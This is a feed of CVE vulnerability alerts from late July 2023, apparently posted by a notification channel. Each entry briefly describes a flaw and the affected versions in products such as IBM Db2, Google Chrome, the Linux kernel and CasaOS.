🚨 CVE-2023-28023A cross site request forgery vulnerability in the BigFix WebUI Software Distribution interface site version 44 and before allows an NMO attacker to access files on server side systems (server machine and all the ones in its network). 🎖@cveNotify |
|
| 2023-08-01 05:58:17 |
🚨 CVE-2021-37386Furukawa Electric LatAm 423-41W/AC before v1.1.4 and LD421-21W before v1.3.3 were discovered to contain an HTML injection vulnerability via the serial number update function.🎖@cveNotify |
|
| 2023-08-01 05:58:14 |
🚨 CVE-2023-30151A SQL injection vulnerability in the Boxtal (envoimoinscher) module for PrestaShop, after version 3.1.10, allows remote attackers to execute arbitrary SQL commands via the `key` GET parameter.🎖@cveNotify |
|
| 2023-08-01 05:58:13 |
🚨 CVE-2023-39173In JetBrains TeamCity before 2023.05.2 a token with limited permissions could be used to gain full account access🎖@cveNotify |
|
| 2023-08-01 05:58:12 |
🚨 CVE-2021-39421A cross-site scripting (XSS) vulnerability in SeedDMS v6.0.15 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.🎖@cveNotify |
|
| 2023-08-01 00:58:13 |
🚨 CVE-2023-3462HashiCorp's Vault and Vault Enterprise are vulnerable to user enumeration when using the LDAP auth method. An attacker may submit requests of existent and non-existent LDAP users and observe the response from Vault to check if the account is valid on the LDAP server. This vulnerability is fixed in Vault 1.14.1 and 1.13.5.🎖@cveNotify |
|
| 2023-08-01 00:58:12 |
🚨 CVE-2023-36884Microsoft is investigating reports of a series of remote code execution vulnerabilities impacting Windows and Office products. Microsoft is aware of targeted attacks that attempt to exploit these vulnerabilities by using specially-crafted Microsoft Office documents.An attacker could create a specially crafted Microsoft Office document that enables them to perform remote code execution in the context of the victim. However, an attacker would have to convince the victim to open the malicious file.Upon completion of this investigation, Microsoft will take the appropriate action to help protect our customers. This might include providing a security update through our monthly release process or providing an out-of-cycle security update, depending on customer needs.Please see the Microsoft Threat Intelligence Blog https://aka.ms/Storm-0978 Entry for important information about steps you can take to protect your system from this vulnerability.This CVE will be updated with new information and links to security updates when they become available.🎖@cveNotify |
|
| 2023-07-31 22:58:23 |
🚨 CVE-2023-0009A local privilege escalation (PE) vulnerability in the Palo Alto Networks GlobalProtect app on Windows enables a local user to execute programs with elevated privileges.🎖@cveNotify |
|
| 2023-07-31 22:58:19 |
🚨 CVE-2023-28729A type confusion vulnerability in Panasonic Control FPWIN Pro versions 7.6.0.3 and all previous versions may allow arbitrary code execution when opening specially crafted project files.🎖@cveNotify |
|
| 2023-07-31 22:58:18 |
🚨 CVE-2023-28730A memory corruption vulnerability Panasonic Control FPWIN Pro versions 7.6.0.3 and all previous versions may allow arbitrary code execution when opening specially crafted project files.🎖@cveNotify |
|
| 2023-07-31 22:58:17 |
🚨 CVE-2023-28728A stack-based buffer overflow in Panasonic Control FPWIN Pro versions 7.6.0.3 and all previous versions may allow arbitrary code execution when opening specially crafted project files.🎖@cveNotify |
|
| 2023-07-31 22:58:16 |
🚨 CVE-2022-42183Precisely Spectrum Spatial Analyst 20.01 is vulnerable to Server-Side Request Forgery (SSRF).🎖@cveNotify |
|
| 2023-07-31 20:58:40 |
🚨 CVE-2023-36266** DISPUTED ** An issue was discovered in Keeper Password Manager for Desktop version 16.10.2, and the KeeperFill Browser Extensions version 16.5.4, allows local attackers to gain sensitive information via plaintext password storage in memory after the user is already logged in, and may persist after logout. NOTE: the vendor disputes this for two reasons: the information is inherently available during a logged-in session when the attacker can read from arbitrary memory locations, and information only remains available after logout because of memory-management limitations of web browsers (not because the Keeper technology itself is retaining the information).🎖@cveNotify |
|
| 2023-07-31 20:58:39 |
🚨 CVE-2023-23487IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.1 and 11.5 is vulnerable to insufficient audit logging. IBM X-Force ID: 245918.🎖@cveNotify |
|
| 2023-07-31 20:58:38 |
🚨 CVE-2023-30442IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.1 and 11.5 federated server is vulnerable to a denial of service as the server may crash when using a specially crafted wrapper using certain options. IBM X-Force ID: 253202.🎖@cveNotify |
|
| 2023-07-31 20:58:37 |
🚨 CVE-2023-30445IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.5, 11.1, and 11.5 is vulnerable to denial of service with a specially crafted query on certain tables. IBM X-Force ID: 253357.🎖@cveNotify |
|
| 2023-07-31 20:58:36 |
🚨 CVE-2023-29256IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.5, 11.1, and 11.5 is vulnerable to an information disclosure due to improper privilege management when certain federation features are used. IBM X-Force ID: 252046.🎖@cveNotify |
|
| 2023-07-31 20:58:32 |
🚨 CVE-2023-30446IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.5, 11.1, and 11.5 is vulnerable to denial of service with a specially crafted query on certain tables. IBM X-Force ID: 253361.🎖@cveNotify |
|
| 2023-07-31 20:58:31 |
🚨 CVE-2023-30449IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.5, 11.1, and 11.5 is vulnerable to denial of service with a specially crafted query. IBM X-Force ID: 253439.🎖@cveNotify |
|
| 2023-07-31 20:58:30 |
🚨 CVE-2023-30447IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.5, 11.1, and 11.5 is vulnerable to denial of service with a specially crafted query on certain tables. IBM X-Force ID: 253436.🎖@cveNotify |
|
| 2023-07-31 20:58:29 |
🚨 CVE-2023-30448IBM DB2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.5, 11.1, and 11.5 is vulnerable to denial of service with a specially crafted query on certain tables. IBM X-Force ID: 253437.🎖@cveNotify |
|
| 2023-07-31 20:58:25 |
🚨 CVE-2023-2908A null pointer dereference issue was found in Libtiff's tif_dir.c file. This issue may allow an attacker to pass a crafted TIFF image file to the tiffcp utility which triggers a runtime error that causes undefined behavior. This will result in an application crash, eventually leading to a denial of service.🎖@cveNotify |
|
| 2023-07-31 20:58:24 |
🚨 CVE-2023-3090A heap out-of-bounds write vulnerability in the Linux Kernel ipvlan network driver can be exploited to achieve local privilege escalation.The out-of-bounds write is caused by missing skb->cb initialization in the ipvlan network driver. The vulnerability is reachable if CONFIG_IPVLAN is enabled.We recommend upgrading past commit 90cbed5247439a966b645b34eb0a2e037836ea8e.🎖@cveNotify |
|
| 2023-07-31 20:58:23 |
🚨 CVE-2023-3389A use-after-free vulnerability in the Linux Kernel io_uring subsystem can be exploited to achieve local privilege escalation.Racing a io_uring cancel poll request with a linked timeout can cause a UAF in a hrtimer.We recommend upgrading past commit ef7dfac51d8ed961b742218f526bd589f3900a59 (4716c73b188566865bdd79c3a6709696a224ac04 for 5.10 stable and 0e388fce7aec40992eadee654193cad345d62663 for 5.15 stable).🎖@cveNotify |
|
| 2023-07-31 20:58:22 |
🚨 CVE-2023-1295A time-of-check to time-of-use issue exists in io_uring subsystem's IORING_OP_CLOSE operation in the Linux kernel's versions 5.6 - 5.11 (inclusive), which allows a local user to elevate their privileges to root. Introduced in b5dba59e0cf7e2cc4d3b3b1ac5fe81ddf21959eb, patched in 9eac1904d3364254d622bf2c771c4f85cd435fc2, backported to stable in 788d0824269bef539fe31a785b1517882eafed93.🎖@cveNotify |
|
| 2023-07-31 20:58:18 |
🚨 CVE-2023-3312A vulnerability was found in drivers/cpufreq/qcom-cpufreq-hw.c in cpufreq subsystem in the Linux Kernel. This flaw, during device unbind will lead to double release problem leading to denial of service.🎖@cveNotify |
|
| 2023-07-31 20:58:17 |
🚨 CVE-2023-30625rudder-server is part of RudderStack, an open source Customer Data Platform (CDP). Versions of rudder-server prior to 1.3.0-rc.1 are vulnerable to SQL injection. This issue may lead to Remote Code Execution (RCE) due to the `rudder` role in PostgresSQL having superuser permissions by default. Version 1.3.0-rc.1 contains patches for this issue.🎖@cveNotify |
|
| 2023-07-31 20:58:16 |
🚨 CVE-2022-26872AMI Megarac Password reset interception via API 🎖@cveNotify |
|
| 2023-07-31 19:58:40 |
🚨 CVE-2023-36543Apache Airflow, versions before 2.6.3, has a vulnerability where an authenticated user can use crafted input to make the current request hang. It is recommended to upgrade to a version that is not affected🎖@cveNotify |
|
| 2023-07-31 19:58:39 |
🚨 CVE-2023-33170ASP.NET and Visual Studio Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2023-07-31 19:58:38 |
🚨 CVE-2023-2958Authorization Bypass Through User-Controlled Key vulnerability in Origin Software ATS Pro allows Authentication Abuse, Authentication Bypass.This issue affects ATS Pro: before 20230714.🎖@cveNotify |
|
| 2023-07-31 19:58:37 |
🚨 CVE-2023-3860A vulnerability was found in phpscriptpoint Insurance 1.2. It has been classified as problematic. Affected is an unknown function of the file /page.php. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-235212. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-31 19:58:33 |
🚨 CVE-2023-37917KubePi is an opensource kubernetes management panel. A normal user has permission to create/update users, they can become admin by editing the `isadmin` value in the request. As a result any user may take administrative control of KubePi. This issue has been addressed in version 1.6.5. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-07-31 19:58:32 |
🚨 CVE-2020-36763Cross Site Scripting (XSS) vulnerability in DuxCMS 2.1 allows remote attackers to run arbitrary code via the content, time, copyfrom parameters when adding or editing a post.🎖@cveNotify |
|
| 2023-07-31 19:58:31 |
🚨 CVE-2023-34916Fuge CMS v1.0 contains an Open Redirect vulnerability via /front/ProcessAct.java.🎖@cveNotify |
|
| 2023-07-31 19:58:30 |
🚨 CVE-2023-34917Fuge CMS v1.0 contains an Open Redirect vulnerability in member/RegisterAct.java.🎖@cveNotify |
|
| 2023-07-31 19:58:29 |
🚨 CVE-2023-37580Zimbra Collaboration (ZCS) 8 before 8.8.15 Patch 41 allows XSS in the Zimbra Classic Web Client.🎖@cveNotify |
|
| 2023-07-31 19:58:25 |
🚨 CVE-2023-38750In Zimbra Collaboration (ZCS) 8 before 8.8.15 Patch 41, 9 before 9.0.0 Patch 34, and 10 before 10.0.2, internal JSP and XML files can be exposed.🎖@cveNotify |
|
| 2023-07-31 19:58:24 |
🚨 CVE-2023-3817Issue summary: Checking excessively long DH keys or parameters may be very slow.Impact summary: Applications that use the functions DH_check(), DH_check_ex()or EVP_PKEY_param_check() to check a DH key or DH parameters may experience longdelays. Where the key or parameters that are being checked have been obtainedfrom an untrusted source this may lead to a Denial of Service.The function DH_check() performs various checks on DH parameters. After fixingCVE-2023-3446 it was discovered that a large q parameter value can also triggeran overly long computation during some of these checks. A correct q value,if present, cannot be larger than the modulus p parameter, thus it isunnecessary to perform these checks if q is larger than p.An application that calls DH_check() and supplies a key or parameters obtainedfrom an untrusted source could be vulnerable to a Denial of Service attack.The function DH_check() is itself called by a number of other OpenSSL functions.An application calling any of those other functions may similarly be affected.The other functions affected by this are DH_check_ex() andEVP_PKEY_param_check().Also vulnerable are the OpenSSL dhparam and pkeyparam command line applicationswhen using the "-check" option.The OpenSSL SSL/TLS implementation is not affected by this issue.The OpenSSL 3.0 and 3.1 FIPS providers are not affected by this issue.🎖@cveNotify |
|
| 2023-07-31 19:58:23 |
🚨 CVE-2023-3997Splunk SOAR versions 6.0.2 and earlier are indirectly affected by a potential vulnerability accessed through the user’s terminal. A third party can send Splunk SOAR a maliciously crafted web request containing special ANSI characters to cause log file poisoning. When a terminal user attempts to view the poisoned logs, this can tamper with the terminal and cause possible malicious code execution from the terminal user’s action.🎖@cveNotify |
|
| 2023-07-31 19:58:22 |
🚨 CVE-2023-4004A use-after-free flaw was found in the Linux kernel's netfilter in the way a user triggers the nft_pipapo_remove function with the element, without a NFT_SET_EXT_KEY_END. This issue could allow a local user to crash the system or potentially escalate their privileges on the system.🎖@cveNotify |
|
| 2023-07-31 19:58:18 |
🚨 CVE-2023-37918Dapr is a portable, event-driven, runtime for building distributed applications across cloud and edge. A vulnerability has been found in Dapr that allows bypassing API token authentication, which is used by the Dapr sidecar to authenticate calls coming from the application, with a well-crafted HTTP request. Users who leverage API token authentication are encouraged to upgrade Dapr to 1.10.9 or to 1.11.2. This vulnerability impacts Dapr users who have configured API token authentication. An attacker could craft a request that is always allowed by the Dapr sidecar over HTTP, even if the `dapr-api-token` in the request is invalid or missing. The issue has been fixed in Dapr 1.10.9 or to 1.11.2. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-07-31 19:58:16 |
🚨 CVE-2023-3610A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation.Flaw in the error handling of bound chains causes a use-after-free in the abort path of NFT_MSG_NEWRULE. The vulnerability requires CAP_NET_ADMIN to be triggered.We recommend upgrading past commit 4bedf9eee016286c835e3d8fa981ddece5338795.🎖@cveNotify |
|
| 2023-07-31 19:58:15 |
🚨 CVE-2023-3861A vulnerability was found in phpscriptpoint Insurance 1.2. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /search.php. The manipulation leads to cross site scripting. The attack can be launched remotely. The identifier VDB-235213 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-31 17:58:34 |
🚨 CVE-2023-38310An issue was discovered in Webmin 2.021. A Stored Cross-Site Scripting (XSS) vulnerability was discovered in the configuration settings of the system logs functionality. The vulnerability allows an attacker to store an XSS payload in the configuration settings of specific log files. This results in the execution of that payload whenever the affected log files are accessed.🎖@cveNotify |
|
| 2023-07-31 17:58:33 |
🚨 CVE-2023-38311An issue was discovered in Webmin 2.021. A Stored Cross-Site Scripting (XSS) vulnerability was discovered in the System Logs Viewer functionality. The vulnerability allows an attacker to store a malicious payload in the configuration field, triggering the execution of the payload when saving the configuration or when accessing the System Logs Viewer page.🎖@cveNotify |
|
| 2023-07-31 17:58:32 |
🚨 CVE-2023-20593An issue in “Zen 2” CPUs, under specific microarchitectural circumstances, may allow an attacker to potentially access sensitive information.🎖@cveNotify |
|
| 2023-07-31 17:58:31 |
🚨 CVE-2023-3347A vulnerability was found in Samba's SMB2 packet signing mechanism. The SMB2 packet signing is not enforced if an admin configured "server signing = required" or for SMB2 connections to Domain Controllers where SMB2 packet signing is mandatory. This flaw allows an attacker to perform attacks, such as a man-in-the-middle attack, by intercepting the network traffic and modifying the SMB2 messages between client and server, affecting the integrity of the data.🎖@cveNotify |
|
| 2023-07-31 17:58:29 |
🚨 CVE-2021-39425SeedDMS v6.0.15 was discovered to contain an open redirect vulnerability. An attacker may exploit this vulnerability to redirect users to arbitrary web URLs by tricking the victim users to click on crafted links.🎖@cveNotify |
|
| 2023-07-31 17:58:28 |
🚨 CVE-2023-25837There is a Cross-site Scripting vulnerability in Esri Portal Sites in versions 10.8.1 – 10.9 that may allow a remote, authenticated attacker to create a crafted link which when clicked could potentially execute arbitrary JavaScript code in the victims browser. The privileges required to execute this attack are high.🎖@cveNotify |
|
| 2023-07-31 17:58:27 |
🚨 CVE-2023-25835There is a Cross-site Scripting vulnerability in Esri Portal Sites in versions 10.8.1 – 11.1 that may allow a remote, authenticated attacker to create a crafted link which when clicked could potentially execute arbitrary JavaScript code in the victims browser. The privileges required to execute this attack are high.🎖@cveNotify |
|
| 2023-07-31 17:58:26 |
🚨 CVE-2023-3815A vulnerability, which was classified as problematic, has been found in y_project RuoYi up to 4.7.7. Affected by this issue is the function uploadFilesPath of the component File Upload. The manipulation of the argument originalFilenames leads to cross site scripting. The attack may be launched remotely. VDB-235118 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-07-31 17:58:25 |
🚨 CVE-2023-32478Dell PowerStore versions prior to 3.5.0.1 contain an insertion of sensitive information into log file vulnerability. A high privileged malicious user could potentially exploit this vulnerability, leading to sensitive information disclosure.🎖@cveNotify |
|
| 2023-07-31 17:58:23 |
🚨 CVE-2020-21662SQL injection vulnerability in yunyecms 2.0.2 allows remote attackers to run arbitrary SQL commands via XFF.🎖@cveNotify |
|
| 2023-07-31 17:58:22 |
🚨 CVE-2020-21881Cross Site Request Forgery (CSRF) vulnerability in admin.php in DuxCMS 2.1 allows remote attackers to modtify application data via article/admin/content/add.🎖@cveNotify |
|
| 2023-07-31 17:58:21 |
🚨 CVE-2021-31651Cross Site Scripting (XSS) vulnerability in neofarg-cms 0.2.3 allows remoate attacker to run arbitrary code via the copyright field in copyright settings.🎖@cveNotify |
|
| 2023-07-31 17:58:20 |
🚨 CVE-2021-31680Deserialization of Untrusted Data vulnerability in yolo 5 allows attackers to execute arbitrary code via crafted yaml file.🎖@cveNotify |
|
| 2023-07-31 17:58:19 |
🚨 CVE-2021-31681Deserialization of Untrusted Data vulnerability in yolo 3 allows attackers to execute arbitrary code via crafted yaml file.🎖@cveNotify |
|
| 2023-07-31 17:58:18 |
🚨 CVE-2023-33534A Cross-Site Request Forgery (CSRF) in Guanzhou Tozed Kangwei Intelligent Technology ZLTS10G software version S10G_3.11.6 allows attackers to takeover user accounts via sending a crafted POST request to /goform/goform_set_cmd_process.🎖@cveNotify |
|
| 2023-07-31 17:58:17 |
🚨 CVE-2023-34635Wifi Soft Unibox Administration 3.0 and 3.1 is vulnerable to SQL Injection. The vulnerability occurs because of not validating or sanitizing the user input in the username field of the login page.🎖@cveNotify |
|
| 2023-07-31 17:58:16 |
🚨 CVE-2023-34644Remote code execution vulnerability in Ruijie Networks Product: RG-EW series home routers EW_3.0(1)B11P204, RG-NBS and RG-S1930 series switches SWITCH_3.0(1)B11P218, RG-EG series business VPN routers EG_3.0(1)B11P216, EAP and RAP series wireless access points AP_3.0(1)B11P218, NBC series wireless controllers AC_3.0(1)B11P86 allows remote attackers to gain escalated privileges via crafted POST request to /cgi-bin/luci/api/auth.🎖@cveNotify |
|
| 2023-07-31 17:58:15 |
🚨 CVE-2023-34842Remote Code Execution vulnerability in DedeCMS through 5.7.109 allows remote attackers to run arbitrary code via crafted POST request to /dede/tpl.php.🎖@cveNotify |
|
| 2023-07-31 17:58:13 |
🚨 CVE-2023-34872A vulnerability in Outline.cc for Poppler prior to 23.06.0 allows a remote attacker to cause a Denial of Service (DoS) (crash) via a crafted PDF file in OutlineItem::open.🎖@cveNotify |
|
| 2023-07-31 17:58:12 |
🚨 CVE-2023-36089** UNSUPPORTED WHEN ASSIGNED ** Authentication Bypass vulnerability in D-Link DIR-645 firmware version 1.03 allows remote attackers to gain escalated privileges via function phpcgi_main in cgibin. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2023-07-31 14:58:29 |
🚨 CVE-2023-35861A shell-injection vulnerability in email notifications on Supermicro motherboards (such as H12DST-B before 03.10.35) allows remote attackers to inject execute arbitrary commands as root on the BMC.🎖@cveNotify |
|
| 2023-07-31 14:58:28 |
🚨 CVE-2023-37647SEMCMS v1.5 was discovered to contain a SQL injection vulnerability via the id parameter at /Ant_Suxin.php.🎖@cveNotify |
|
| 2023-07-31 14:58:27 |
🚨 CVE-2023-37265CasaOS is an open-source Personal Cloud system. Due to a lack of IP address verification an unauthenticated attackers can execute arbitrary commands as `root` on CasaOS instances. The problem was addressed by improving the detection of client IP addresses in `391dd7f`. This patch is part of CasaOS 0.4.4. Users should upgrade to CasaOS 0.4.4. If they can't, they should temporarily restrict access to CasaOS to untrusted users, for instance by not exposing it publicly. 🎖@cveNotify |
|
| 2023-07-31 14:58:23 |
🚨 CVE-2023-37266CasaOS is an open-source Personal Cloud system. Unauthenticated attackers can craft arbitrary JWTs and access features that usually require authentication and execute arbitrary commands as `root` on CasaOS instances. This problem was addressed by improving the validation of JWTs in commit `705bf1f`. This patch is part of CasaOS 0.4.4. Users should upgrade to CasaOS 0.4.4. If they can't, they should temporarily restrict access to CasaOS to untrusted users, for instance by not exposing it publicly.🎖@cveNotify |
|
| 2023-07-31 14:58:22 |
🚨 CVE-2023-36675An issue was discovered in MediaWiki before 1.35.11, 1.36.x through 1.38.x before 1.38.7, and 1.39.x before 1.39.4. BlockLogFormatter.php in BlockLogFormatter allows XSS in the partial blocks feature.🎖@cveNotify |
|
| 2023-07-31 14:58:21 |
🚨 CVE-2022-24193CasaOS before v0.2.7 was discovered to contain a command injection vulnerability.🎖@cveNotify |
|
| 2023-07-31 14:58:20 |
🚨 CVE-2021-4316Inappropriate implementation in Cast UI in Google Chrome prior to 96.0.4664.45 allowed a remote attacker to spoof browser UI via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2023-07-31 14:58:16 |
🚨 CVE-2021-4317Use after free in ANGLE in Google Chrome prior to 96.0.4664.93 allowed a remote attacker to perform arbitrary read/write via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-07-31 14:58:15 |
🚨 CVE-2021-4318Object corruption in Blink in Google Chrome prior to 94.0.4606.54 allowed a remote attacker to potentially exploit object corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-07-31 14:58:14 |
🚨 CVE-2021-4319Use after free in Blink in Google Chrome prior to 93.0.4577.82 allowed a remote attacker to perform arbitrary read/write via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-07-31 14:58:13 |
🚨 CVE-2023-38988An issue in the delete function in the OaNotifyController class of jeesite v1.2.6 allows authenticated attackers to arbitrarily delete notifications created by Administrators.🎖@cveNotify |
|
| 2023-07-31 14:58:12 |
🚨 CVE-2023-3598Out of bounds read and write in ANGLE in Google Chrome prior to 114.0.5735.90 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-07-31 10:58:23 |
🚨 CVE-2023-34360A stored cross-site scripting (XSS) issue was discovered within the Custom User Icons functionality of ASUS RT-AX88U running firmware versions 3.0.0.4.388.23110 and prior. After a remote attacker logging in device with regular user privilege, the remote attacker can perform a Stored Cross-site Scripting (XSS) attack by uploading image which containing JavaScript code.🎖@cveNotify |
|
| 2023-07-31 10:58:22 |
🚨 CVE-2023-34358ASUS RT-AX88U's httpd is subject to an unauthenticated DoS condition. A remote attacker can send a specially crafted request to a device which contains a specific user agent, causing the httpd binary to crash during a string comparison performed within web.c, resulting in a DoS condition.🎖@cveNotify |
|
| 2023-07-31 10:58:21 |
🚨 CVE-2023-34359ASUS RT-AX88U's httpd is subject to an unauthenticated DoS condition. A remote attacker can send a specially crafted request to the device which causes the httpd binary to crash within the "do_json_decode()" function of ej.c, resulting in a DoS condition.🎖@cveNotify |
|
| 2023-07-31 06:58:34 |
🚨 CVE-2020-4868IBM TRIRIGA 3.0, 4.0, and 4.4 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 190744.🎖@cveNotify |
|
| 2023-07-31 06:58:33 |
🚨 CVE-2022-43831IBM Storage Scale Container Native Storage Access 5.1.2.1 through 5.1.6.1 could allow a local user to obtain escalated privileges on a host without proper security context settings configured. IBM X-Force ID: 238941.🎖@cveNotify |
|
| 2023-07-31 06:58:29 |
🚨 CVE-2023-35019IBM Security Verify Governance, Identity Manager 10.0 could allow a remote authenticated attacker to execute arbitrary commands on the system by sending a specially crafted request. IBM X-Force ID: 257873.🎖@cveNotify |
|
| 2023-07-31 06:58:28 |
🚨 CVE-2023-4006Improper Neutralization of Formula Elements in a CSV File in GitHub repository thorsten/phpmyfaq prior to 3.1.16.🎖@cveNotify |
|
| 2023-07-31 06:58:27 |
🚨 CVE-2023-4007Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.16.🎖@cveNotify |
|
| 2023-07-30 22:58:30 |
🚨 CVE-2023-3610A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation.Flaw in the error handling of bound chains causes a use-after-free in the abort path of NFT_MSG_NEWRULE. The vulnerability requires CAP_NET_ADMIN to be triggered.We recommend upgrading past commit 4bedf9eee016286c835e3d8fa981ddece5338795.🎖@cveNotify |
|
| 2023-07-30 22:58:29 |
🚨 CVE-2023-3390A use-after-free vulnerability was found in the Linux kernel's netfilter subsystem in net/netfilter/nf_tables_api.c.Mishandled error handling with NFT_MSG_NEWRULE makes it possible to use a dangling pointer in the same transaction causing a use-after-free vulnerability. This flaw allows a local attacker with user access to cause a privilege escalation issue.We recommend upgrading past commit 1240eb93f0616b21c675416516ff3d74798fdc97.🎖@cveNotify |
|
| 2023-07-30 16:58:23 |
🚨 CVE-2023-28130Local user may lead to privilege escalation using Gaia Portal hostnames page.🎖@cveNotify |
|
| 2023-07-30 12:58:26 |
🚨 CVE-2023-37217 Tadiran Telecom Aeonix - CWE-204: Observable Response Discrepancy🎖@cveNotify |
|
| 2023-07-30 12:58:25 |
🚨 CVE-2023-37218 Tadiran Telecom Aeonix - CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')🎖@cveNotify |
|
| 2023-07-30 12:58:24 |
🚨 CVE-2023-37219 Tadiran Telecom Composit - CWE-1236: Improper Neutralization of Formula Elements in a CSV File🎖@cveNotify |
|
| 2023-07-30 12:58:23 |
🚨 CVE-2023-37216 AnaSystem SensMini M4 – Using the configuration tool, an authenticated user can cause Denial of Service for the device🎖@cveNotify |
|
| 2023-07-30 11:58:34 |
🚨 CVE-2023-32227 Synel SYnergy Fingerprint Terminals - CWE-798: Use of Hard-coded Credentials🎖@cveNotify |
|
| 2023-07-30 11:58:33 |
🚨 CVE-2023-37213 Synel SYnergy Fingerprint Terminals - CWE-78: 'OS Command Injection'🎖@cveNotify |
|
| 2023-07-30 11:58:32 |
🚨 CVE-2023-37215 JBL soundbar multibeam 5.1 - CWE-798: Use of Hard-coded Credentials🎖@cveNotify |
|
| 2023-07-29 10:58:26 |
🚨 CVE-2023-36542Apache NiFi 0.0.2 through 1.22.0 include Processors and Controller Services that support HTTP URL references for retrieving drivers, which allows an authenticated and authorized user to configure a location that enables custom code execution. The resolution introduces a new Required Permission for referencing remote resources, restricting configuration of these components to privileged users. The permission prevents unprivileged users from configuring Processors and Controller Services annotated with the new Reference Remote Resources restriction. Upgrading to Apache NiFi 1.23.0 is the recommended mitigation.🎖@cveNotify |
|
| 2023-07-29 10:58:25 |
🚨 CVE-2023-3269A vulnerability exists in the memory management subsystem of the Linux kernel. The lock handling for accessing and updating virtual memory areas (VMAs) is incorrect, leading to use-after-free problems. This issue can be successfully exploited to execute arbitrary kernel code, escalate containers, and gain root privileges.🎖@cveNotify |
|
| 2023-07-29 05:58:42 |
🚨 CVE-2021-4324Insufficient policy enforcement in Google Update in Google Chrome prior to 90.0.4430.93 allowed a remote attacker to read arbitrary files via a malicious file. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-07-29 05:58:41 |
🚨 CVE-2022-4906Inappropriate implementation in Blink in Google Chrome prior to 108.0.5359.71 allowed a remote attacker to perform arbitrary read/write via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-07-29 05:58:40 |
🚨 CVE-2022-4907Uninitialized Use in FFmpeg in Google Chrome prior to 108.0.5359.71 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-07-29 05:58:39 |
🚨 CVE-2022-4908Inappropriate implementation in iFrame Sandbox in Google Chrome prior to 107.0.5304.62 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-07-29 05:58:38 |
🚨 CVE-2022-4909Inappropriate implementation in XML in Google Chrome prior to 107.0.5304.62 allowed a remote attacker to potentially perform an ASLR bypass via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2023-07-29 05:58:37 |
🚨 CVE-2022-4910Inappropriate implementation in Autofill in Google Chrome prior to 107.0.5304.62 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-07-29 05:58:36 |
🚨 CVE-2022-4911Insufficient data validation in DevTools in Google Chrome prior to 106.0.5249.62 allowed a remote attacker to bypass content security policy via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2023-07-29 05:58:35 |
🚨 CVE-2022-4912Type Confusion in MathML in Google Chrome prior to 105.0.5195.52 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-07-29 05:58:34 |
🚨 CVE-2022-4913Inappropriate implementation in Extensions in Google Chrome prior to 105.0.5195.52 allowed a remote attacker who had compromised the renderer process to spoof extension storage via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-07-29 05:58:33 |
🚨 CVE-2022-4914Heap buffer overflow in PrintPreview in Google Chrome prior to 104.0.5112.79 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-07-29 05:58:29 |
🚨 CVE-2022-4915Inappropriate implementation in URL Formatting in Google Chrome prior to 103.0.5060.134 allowed a remote attacker to perform domain spoofing via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-07-29 05:58:28 |
🚨 CVE-2022-4916Use after free in Media in Google Chrome prior to 103.0.5060.53 allowed a remote attacker to perform arbitrary read/write via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-07-29 05:58:27 |
🚨 CVE-2022-4917Incorrect security UI in Notifications in Google Chrome on Android prior to 103.0.5060.53 allowed a remote attacker to obscure the full screen notification via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2023-07-29 05:58:26 |
🚨 CVE-2022-4918Use after free in UI in Google Chrome prior to 102.0.5005.61 allowed a remote attacker to perform arbitrary read/write via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-07-29 05:58:25 |
